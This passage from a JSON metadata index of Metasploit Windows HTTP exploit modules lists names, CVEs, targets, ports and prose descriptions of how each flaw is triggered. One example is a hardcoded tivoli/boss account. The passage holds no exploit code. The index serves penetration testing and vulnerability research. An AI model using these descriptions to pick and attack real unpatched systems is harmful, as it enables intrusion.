module exploits a buffer overflow in HP Power Manager's 'formExportDataLogs'.\n By creating a malformed request specifically for the fileName parameter, a stack-based\n buffer overflow occurs due to a long error message (which contains the fileName),\n which may result in arbitrary remote code execution under the context of 'SYSTEM'.", + "references": [ + "CVE-2009-3999", + "OSVDB-61848", + "BID-37867" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows XP SP3 / Win Server 2003 SP0" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/hp_power_manager_filename.rb", + "is_install_path": true, + "ref_name": "windows/http/hp_power_manager_filename", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/hp_power_manager_login": { + "name": "Hewlett-Packard Power Manager Administration Buffer Overflow", + "fullname": "exploit/windows/http/hp_power_manager_login", + "aliases": [], + "rank": 200, + "disclosure_date": "2009-11-04", + "type": "exploit", + "author": [ + "MC ", + "sinn3r " + ], + "description": "This module exploits a stack buffer overflow in Hewlett-Packard Power Manager 4.2.\n Sending a specially crafted POST request with an overly long Login string, an\n attacker may be able to execute arbitrary code.", + "references": [ + "CVE-2009-2685", + "OSVDB-59684" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows 2000 SP4 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/hp_power_manager_login.rb", + "is_install_path": true, + "ref_name": "windows/http/hp_power_manager_login", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/hp_sitescope_dns_tool": { + "name": "HP SiteScope DNS Tool Command Injection", + "fullname": "exploit/windows/http/hp_sitescope_dns_tool", + "aliases": [], + "rank": 400, + "disclosure_date": "2015-10-09", + "type": "exploit", + "author": [ + "Kirk Hayes", + "Charles Riggs", + "Juan Vazquez" + ], + "description": "This module exploits a command injection vulnerability\n discovered in HP SiteScope 11.30 and earlier versions (tested in 11.26\n and 11.30). The vulnerability exists in the DNS Tool allowing an\n attacker to execute arbitrary commands in the context of the service. By\n default, HP SiteScope installs and runs as SYSTEM in Windows and does\n not require authentication. This vulnerability only exists on the\n Windows version. The Linux version is unaffected.", + "references": [ + "URL-https://www.rapid7.com/blog/post/2015/10/09/r7-2015-17-hp-sitescope-dns-tool-command-injection", + "URL-http://www8.hp.com/us/en/software-solutions/sitescope-application-monitoring/index.html" + ], + "platform": "Windows", + "arch": "", + "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "HP SiteScope 11.30 / Microsoft Windows 7 and higher", + "HP SiteScope 11.30 / CMD" + ], + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/exploits/windows/http/hp_sitescope_dns_tool.rb", + "is_install_path": true, + "ref_name": "windows/http/hp_sitescope_dns_tool", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/hp_sitescope_runomagentcommand": { + "name": "HP SiteScope Remote Code Execution", + "fullname": "exploit/windows/http/hp_sitescope_runomagentcommand", + "aliases": [], + "rank": 0, + "disclosure_date": "2013-07-29", + "type": "exploit", + "author": [ + "rgod ", + "juan vazquez " + ], + "description": "This module exploits a code execution flaw in HP SiteScope.\n The vulnerability exists in the opcactivate.vbs script, which\n is reachable from the APIBSMIntegrationImpl AXIS service, and\n uses WScript.Shell.run() to execute cmd.exe with user provided\n data. Note that the opcactivate.vbs component is installed\n with the (optional) HP Operations Agent component. The module\n has been tested successfully on HP SiteScope 11.20 (with HP\n Operations Agent) over Windows 2003 SP2.", + "references": [ + "CVE-2013-2367", + "OSVDB-95824", + "BID-61506", + "ZDI-13-205" + ], + "platform": "Windows", + "arch": "x86", + "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "HP SiteScope 11.20 (with Operations Agent) / Windows 2003 SP2" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/hp_sitescope_runomagentcommand.rb", + "is_install_path": true, + "ref_name": "windows/http/hp_sitescope_runomagentcommand", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/hpe_sim_76_amf_deserialization": { + "name": "HPE Systems Insight Manager AMF Deserialization RCE", + "fullname": "exploit/windows/http/hpe_sim_76_amf_deserialization", + "aliases": [], + "rank": 600, + "disclosure_date": "2020-12-15", + "type": "exploit", + "author": [ + "Harrison Neal", + "Jang", + "Grant Willcox" + ], + "description": "A remotely exploitable vulnerability exists within HPE System Insight Manager (SIM) version 7.6.x that can be\n leveraged by a remote unauthenticated attacker to execute code within the context of HPE System Insight\n Manager's hpsimsvc.exe process, which runs with administrative privileges. The vulnerability occurs due\n to a failure to validate data during the deserialization process when a user submits a POST request to\n the /simsearch/messagebroker/amfsecure page. This module exploits this vulnerability by leveraging an\n outdated copy of Commons Collection, namely 3.2.2, that ships with HPE SIM, to gain\n RCE as the administrative user running HPE SIM.", + "references": [ + "CVE-2020-7200", + "URL-https://testbnull.medium.com/hpe-system-insight-manager-sim-amf-deserialization-lead-to-rce-cve-2020-7200-d49a9cf143c0", + "URL-https://www.zerodayinitiative.com/advisories/ZDI-20-1449/", + "URL-https://support.hpe.com/hpesc/public/docDisplay?docLocale=en_US&docId=hpesbgn04068en_us" + ], + "platform": "Windows", + "arch": "", + "rport": 50000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows Command", + "Windows Powershell" + ], + "mod_time": "2024-07-24 16:42:43 +0000", + "path": "/modules/exploits/windows/http/hpe_sim_76_amf_deserialization.rb", + "is_install_path": true, + "ref_name": "windows/http/hpe_sim_76_amf_deserialization", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [ + "repeatable-session" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/httpdx_handlepeer": { + "name": "HTTPDX h_handlepeer() Function Buffer Overflow", + "fullname": "exploit/windows/http/httpdx_handlepeer", + "aliases": [], + "rank": 500, + "disclosure_date": "2009-10-08", + "type": "exploit", + "author": [ + "Pankaj Kohli ", + "Trancer ", + "jduck " + ], + "description": "This module exploits a stack-based buffer overflow vulnerability in HTTPDX HTTP server 1.4. The\n vulnerability is caused due to a boundary error within the \"h_handlepeer()\" function in http.cpp.\n By sending an overly long HTTP request, an attacker can overrun a buffer and execute arbitrary code.", + "references": [ + "OSVDB-58714", + "CVE-2009-3711", + "URL-http://www.pank4j.com/exploits/httpdxb0f.php", + "URL-http://www.rec-sec.com/2009/10/16/httpdx-buffer-overflow-exploit/" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "httpdx 1.4 - Windows XP SP3 English", + "httpdx 1.4 - Windows 2003 SP2 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/httpdx_handlepeer.rb", + "is_install_path": true, + "ref_name": "windows/http/httpdx_handlepeer", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/httpdx_tolog_format": { + "name": "HTTPDX tolog() Function Format String Vulnerability", + "fullname": "exploit/windows/http/httpdx_tolog_format", + "aliases": [], + "rank": 500, + "disclosure_date": "2009-11-17", + "type": "exploit", + "author": [ + "jduck " + ], + "description": "This module exploits a format string vulnerability in HTTPDX HTTP server.\n By sending a specially crafted HTTP request containing format specifiers, an\n attacker can corrupt memory and execute arbitrary code.\n\n By default logging is off for HTTP, but enabled for the 'moderator' user\n via FTP.", + "references": [ + "CVE-2009-4769", + "OSVDB-60182" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic Targeting", + "httpdx 1.4 - Windows XP SP3 English", + "httpdx 1.4.5 - Windows XP SP3 English", + "httpdx 1.4.6 - Windows XP SP3 English", + "httpdx 1.4.6b - Windows XP SP3 English", + "httpdx 1.5 - Windows XP SP3 English", + "Debug target" + ], + "mod_time": "2023-05-30 10:56:41 +0000", + "path": "/modules/exploits/windows/http/httpdx_tolog_format.rb", + "is_install_path": true, + "ref_name": "windows/http/httpdx_tolog_format", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/ia_webmail": { + "name": "IA WebMail 3.x Buffer Overflow", + "fullname": "exploit/windows/http/ia_webmail", + "aliases": [], + "rank": 200, + "disclosure_date": "2003-11-03", + "type": "exploit", + "author": [ + "hdm " + ], + "description": "This exploits a stack buffer overflow in the IA WebMail server.\n This exploit has not been tested against a live system at\n this time.", + "references": [ + "CVE-2003-1192", + "OSVDB-2757", + "BID-8965", + "URL-http://www.k-otik.net/exploits/11.19.iawebmail.pl.php" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "IA WebMail 3.x" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/ia_webmail.rb", + "is_install_path": true, + "ref_name": "windows/http/ia_webmail", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/ibm_tivoli_endpoint_bof": { + "name": "IBM Tivoli Endpoint Manager POST Query Buffer Overflow", + "fullname": "exploit/windows/http/ibm_tivoli_endpoint_bof", + "aliases": [], + "rank": 400, + "disclosure_date": "2011-05-31", + "type": "exploit", + "author": [ + "bannedit ", + "Jeremy Brown <0xjbrown@gmail.com>" + ], + "description": "This module exploits a stack based buffer overflow in the way IBM Tivoli\n Endpoint Manager versions 3.7.1, 4.1, 4.1.1, 4.3.1 handles long POST query\n arguments.\n\n This issue can be triggered by sending a specially crafted HTTP POST request to\n the service (lcfd.exe) listening on TCP port 9495. To trigger this issue authorization\n is required. This exploit makes use of a second vulnerability, a hardcoded account\n (tivoli/boss) is used to bypass the authorization restriction.", + "references": [ + "CVE-2011-1220", + "OSVDB-72713", + "OSVDB-72751", + "BID-48049", + "ZDI-11-169" + ], + "platform": "Windows", + "arch": "", + "rport": 9495, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic", + "Windows Server 2003 SP0", + "Windows Server 2003 SP1", + "Windows Server 2003 SP2" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/ibm_tivoli_endpoint_bof.rb", + "is_install_path": true, + "ref_name": "windows/http/ibm_tivoli_endpoint_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/ibm_tpmfosd_overflow": { + "name": "IBM TPM for OS Deployment 5.1.0.x rembo.exe Buffer Overflow", + "fullname": "exploit/windows/http/ibm_tpmfosd_overflow", + "aliases": [], + "rank": 400, + "disclosure_date": "2007-05-02", + "type": "exploit", + "author": [ + "toto" + ], + "description": "This is a stack buffer overflow exploit for IBM Tivoli Provisioning Manager\n for OS Deployment version 5.1.0.X.", + "references": [ + "CVE-2007-1868", + "OSVDB-34678", + "BID-23264", + "URL-http://dvlabs.tippingpoint.com/advisory/TPTI-07-05" + ], + "platform": "Windows", + "arch": "", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "TPMfOSD 5.1 (Windows 2000 SP4 - English)", + "TPMfOSD 5.1 (Windows 2003 All - English)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/ibm_tpmfosd_overflow.rb", + "is_install_path": true, + "ref_name": "windows/http/ibm_tpmfosd_overflow", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/ibm_tsm_cad_header": { + "name": "IBM Tivoli Storage Manager Express CAD Service Buffer Overflow", + "fullname": "exploit/windows/http/ibm_tsm_cad_header", + "aliases": [], + "rank": 400, + "disclosure_date": "2007-09-24", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in the IBM Tivoli Storage Manager Express CAD Service (5.3.3).\n By sending an overly long GET request, it may be possible for an attacker to execute arbitrary code.", + "references": [ + "CVE-2007-4880", + "OSVDB-38161", + "BID-25743" + ], + "platform": "Windows", + "arch": "", + "rport": 1581, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "IBM Tivoli Storage Manager Express 5.3.3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/ibm_tsm_cad_header.rb", + "is_install_path": true, + "ref_name": "windows/http/ibm_tsm_cad_header", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/icecast_header": { + "name": "Icecast Header Overwrite", + "fullname": "exploit/windows/http/icecast_header", + "aliases": [], + "rank": 500, + "disclosure_date": "2004-09-28", + "type": "exploit", + "author": [ + "spoonm ", + "Luigi Auriemma " + ], + "description": "This module exploits a buffer overflow in the header parsing of icecast\n versions 2.0.1 and earlier, discovered by Luigi Auriemma. Sending 32\n HTTP headers will cause a write one past the end of a pointer array. On\n win32 this happens to overwrite the saved instruction pointer, and on\n linux (depending on compiler, etc) this seems to generally overwrite\n nothing crucial (read not exploitable).\n\n This exploit uses ExitThread(), this will leave icecast thinking the\n thread is still in use, and the thread counter won't be decremented.\n This means for each time your payload exits, the counter will be left\n incremented, and eventually the threadpool limit will be maxed. So you\n can multihit, but only till you fill the threadpool.", + "references": [ + "CVE-2004-1561", + "OSVDB-10406", + "BID-11271", + "URL-http://archives.neohapsis.com/archives/bugtraq/2004-09/0366.html" + ], + "platform": "Windows", + "arch": "", + "rport": 8000, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/icecast_header.rb", + "is_install_path": true, + "ref_name": "windows/http/icecast_header", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/integard_password_bof": { + "name": "Race River Integard Home/Pro LoginAdmin Password Stack Buffer Overflow", + "fullname": "exploit/windows/http/integard_password_bof", + "aliases": [], + "rank": 500, + "disclosure_date": "2010-09-07", + "type": "exploit", + "author": [ + "Lincoln", + "Nullthreat", + "rick2600", + "corelanc0d3r ", + "jduck " + ], + "description": "This module exploits a stack buffer overflow in Race river's Integard Home/Pro\n internet content filter HTTP Server. Versions prior to 2.0.0.9037 and 2.2.0.9037 are\n vulnerable.\n\n The administration web page on port 18881 is vulnerable to a remote buffer overflow\n attack. By sending a long character string in the password field, both the structured\n exception handler and the saved extended instruction pointer are over written, allowing\n an attacker to gain control of the application and the underlying operating system\n remotely.\n\n The administration website service runs with SYSTEM privileges, and automatically\n restarts when it crashes.", + "references": [ + "OSVDB-67909", + "URL-http://www.corelan.be:8800/advisories.php?id=CORELAN-10-061" + ], + "platform": "Windows", + "arch": "", + "rport": 18881, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic Targeting", + "Integard Home 2.0.0.9021", + "Integard Pro 2.2.0.9026" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/integard_password_bof.rb", + "is_install_path": true, + "ref_name": "windows/http/integard_password_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/intersystems_cache": { + "name": "InterSystems Cache UtilConfigHome.csp Argument Buffer Overflow", + "fullname": "exploit/windows/http/intersystems_cache", + "aliases": [], + "rank": 500, + "disclosure_date": "2009-09-29", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in InterSystems Cache 2009.1.\n By sending a specially crafted GET request, an attacker may be able to execute\n arbitrary code.", + "references": [ + "OSVDB-60549", + "BID-37177" + ], + "platform": "Windows", + "arch": "", + "rport": 57772, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows 2000 SP4 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/intersystems_cache.rb", + "is_install_path": true, + "ref_name": "windows/http/intersystems_cache", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/intrasrv_bof": { + "name": "Intrasrv 1.0 Buffer Overflow", + "fullname": "exploit/windows/http/intrasrv_bof", + "aliases": [], + "rank": 0, + "disclosure_date": "2013-05-30", + "type": "exploit", + "author": [ + "xis_one", + "PsychoSpy " + ], + "description": "This module exploits a boundary condition error in Intrasrv Simple Web\n Server 1.0. The web interface does not validate the boundaries of an\n HTTP request string prior to copying the data to an insufficiently sized\n buffer. Successful exploitation leads to arbitrary remote code execution\n in the context of the application.", + "references": [ + "OSVDB-94097", + "EDB-18397", + "BID-60229" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "v1.0 - XP / Win7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/intrasrv_bof.rb", + "is_install_path": true, + "ref_name": "windows/http/intrasrv_bof", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/ipswitch_wug_maincfgret": { + "name": "Ipswitch WhatsUp Gold 8.03 Buffer Overflow", + "fullname": "exploit/windows/http/ipswitch_wug_maincfgret", + "aliases": [], + "rank": 500, + "disclosure_date": "2004-08-25", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a buffer overflow in IPswitch WhatsUp Gold 8.03. By\n posting a long string for the value of 'instancename' in the _maincfgret.cgi\n script an attacker can overflow a buffer and execute arbitrary code on the system.", + "references": [ + "CVE-2004-0798", + "OSVDB-9177", + "BID-11043" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "WhatsUP Gold 8.03 Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/ipswitch_wug_maincfgret.rb", + "is_install_path": true, + "ref_name": "windows/http/ipswitch_wug_maincfgret", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/ivanti_avalanche_filestoreconfig_upload": { + "name": "Ivanti Avalanche FileStoreConfig File Upload", + "fullname": "exploit/windows/http/ivanti_avalanche_filestoreconfig_upload", + "aliases": [], + "rank": 600, + "disclosure_date": "2023-04-24", + "type": "exploit", + "author": [ + "Piotr Bazydlo", + "Shelby Pace" + ], + "description": "Ivanti Avalanche prior to v6.4.0.186 permits MS-DOS style short\n names in the configuration path for the Central FileStore. Because of\n this, an administrator can change the default path to the web root\n of the applications, upload a JSP file, and achieve RCE as NT AUTHORITY\\SYSTEM.", + "references": [ + "URL-https://www.zerodayinitiative.com/advisories/ZDI-23-456/", + "URL-https://forums.ivanti.com/s/article/ZDI-CAN-17812-Ivanti-Avalanche-FileStoreConfig-Arbitrary-File-Upload-Remote-Code-Execution-Vulnerability?language=en_US", + "URL-https://attackerkb.com/topics/jcdcN9SN9V/cve-2023-28128", + "CVE-2023-28128" + ], + "platform": "Java,Windows", + "arch": "java", + "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic Target" + ], + "mod_time": "2023-05-12 16:08:47 +0000", + "path": "/modules/exploits/windows/http/ivanti_avalanche_filestoreconfig_upload.rb", + "is_install_path": true, + "ref_name": "windows/http/ivanti_avalanche_filestoreconfig_upload", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs", + "artifacts-on-disk" + ] + }, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/ivanti_epm_recordgoodapp_sqli_rce": { + "name": "Ivanti EPM RecordGoodApp SQLi RCE", + "fullname": "exploit/windows/http/ivanti_epm_recordgoodapp_sqli_rce", + "aliases": [], + "rank": 300, + "disclosure_date": "2024-05-24", + "type": "exploit", + "author": [ + "James Horseman", + "Christophe De La Fuente" + ], + "description": "Ivanti Endpoint Manager (EPM) 2022 SU5 and prior are vulnerable to unauthenticated SQL injection which can be leveraged to achieve unauthenticated remote code execution.", + "references": [ + "URL-https://forums.ivanti.com/s/article/Security-Advisory-May-2024", + "URL-https://www.zerodayinitiative.com/advisories/ZDI-24-507", + "URL-https://github.com/horizon3ai/CVE-2024-29824", + "URL-https://www.horizon3.ai/attack-research/attack-blogs/cve-2024-29824-deep-dive-ivanti-epm-sql-injection-remote-code-execution-vulnerability/", + "CVE-2024-29824" + ], + "platform": "Windows", + "arch": "cmd", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic Target" + ], + "mod_time": "2024-06-21 10:13:08 +0000", + "path": "/modules/exploits/windows/http/ivanti_epm_recordgoodapp_sqli_rce.rb", + "is_install_path": true, + "ref_name": "windows/http/ivanti_epm_recordgoodapp_sqli_rce", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs", + "artifacts-on-disk" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/jira_collector_traversal": { + "name": "JIRA Issues Collector Directory Traversal", + "fullname": "exploit/windows/http/jira_collector_traversal", + "aliases": [], + "rank": 300, + "disclosure_date": "2014-02-26", + "type": "exploit", + "author": [ + "Philippe Arteau", + "juan vazquez " + ], + "description": "This module exploits a directory traversal flaw in JIRA 6.0.3. The vulnerability exists\n in the issues collector code, while handling attachments provided by the user. It can be\n exploited in Windows environments to get remote code execution. This module has been tested\n successfully on JIRA 6.0.3 with Windows 2003 SP2 Server.", + "references": [ + "CVE-2014-2314", + "OSVDB-103807", + "BID-65849", + "URL-https://confluence.atlassian.com/display/JIRA/JIRA+Security+Advisory+2014-02-26", + "URL-http://blog.h3xstream.com/2014/02/jira-path-traversal-explained.html" + ], + "platform": "Windows", + "arch": "", + "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Jira 6.0.3 / Windows 2003 SP2" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/jira_collector_traversal.rb", + "is_install_path": true, + "ref_name": "windows/http/jira_collector_traversal", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/kaseya_uploader": { + "name": "Kaseya VSA uploader.aspx Arbitrary File Upload", + "fullname": "exploit/windows/http/kaseya_uploader", + "aliases": [], + "rank": 600, + "disclosure_date": "2015-09-23", + "type": "exploit", + "author": [ + "Pedro Ribeiro " + ], + "description": "This module exploits an arbitrary file upload vulnerability found in Kaseya VSA versions\n between 7 and 9.1. A malicious unauthenticated user can upload an ASP file to an arbitrary\n directory leading to arbitrary code execution with IUSR privileges. This module has been\n tested with Kaseya v7.0.0.17, v8.0.0.10 and v9.0.0.3.", + "references": [ + "CVE-2015-6922", + "ZDI-15-449", + "URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/Kaseya/kaseya-vsa-vuln-2.txt", + "URL-https://seclists.org/bugtraq/2015/Sep/132" + ], + "platform": "Windows", + "arch": "x86", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Kaseya VSA v7 to v9.1" + ], + "mod_time": "2022-01-13 18:47:11 +0000", + "path": "/modules/exploits/windows/http/kaseya_uploader.rb", + "is_install_path": true, + "ref_name": "windows/http/kaseya_uploader", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/kaseya_uploadimage_file_upload": { + "name": "Kaseya uploadImage Arbitrary File Upload", + "fullname": "exploit/windows/http/kaseya_uploadimage_file_upload", + "aliases": [], + "rank": 600, + "disclosure_date": "2013-11-11", + "type": "exploit", + "author": [ + "Thomas Hibbert " + ], + "description": "This module exploits an arbitrary file upload vulnerability found in Kaseya versions below\n 6.3.0.2. A malicious user can upload an ASP file to an arbitrary directory without previous\n authentication, leading to arbitrary code execution with IUSR privileges.", + "references": [ + "OSVDB-99984", + "BID-63782", + "EDB-29675", + "URL-http://security-assessment.com/files/documents/advisory/Kaseya%20File%20Upload.pdf" + ], + "platform": "Windows", + "arch": "x86", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Kaseya KServer / Windows" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb", + "is_install_path": true, + "ref_name": "windows/http/kaseya_uploadimage_file_upload", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/kentico_staging_syncserver": { + "name": "Kentico CMS Staging SyncServer Unserialize Remote Command Execution", + "fullname": "exploit/windows/http/kentico_staging_syncserver", + "aliases": [], + "rank": 600, + "disclosure_date": "2019-04-15", + "type": "exploit", + "author": [ + "Manoj Cherukuri", + "Justin LeMay", + "aushack " + ], + "description": "This module exploits a vulnerability in the Kentico CMS platform versions 12.0.14 and earlier.\n Remote Command Execution is possible via unauthenticated XML requests to the Staging Service\n SyncServer.asmx interface ProcessSynchronizationTaskData method stagingTaskData parameter. XML\n input is passed to an insecure .NET deserialize call which allows for remote command execution.", + "references": [ + "CVE-2019-10068", + "URL-https://www.aon.com/cyber-solutions/aon_cyber_labs/unauthenticated-remote-code-execution-in-kentico-cms/" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic", + "Windows EXE Dropper", + "Windows Command", + "Windows Powershell" + ], + "mod_time": "2023-02-10 18:04:31 +0000", + "path": "/modules/exploits/windows/http/kentico_staging_syncserver.rb", + "is_install_path": true, + "ref_name": "windows/http/kentico_staging_syncserver", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk", + "ioc-in-logs" + ], + "Reliability": [ + "repeatable-session" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/kolibri_http": { + "name": "Kolibri HTTP Server HEAD Buffer Overflow", + "fullname": "exploit/windows/http/kolibri_http", + "aliases": [], + "rank": 400, + "disclosure_date": "2010-12-26", + "type": "exploit", + "author": [ + "mr_me ", + "TheLeader", + "sinn3r " + ], + "description": "This exploits a stack buffer overflow in version 2 of the Kolibri HTTP server.", + "references": [ + "CVE-2002-2268", + "OSVDB-70808", + "BID-6289", + "EDB-15834" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows XP sp3", + "Windows Server 2003 sp2" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/kolibri_http.rb", + "is_install_path": true, + "ref_name": "windows/http/kolibri_http", + "check": true, + "post_auth": false, + "default_credential": 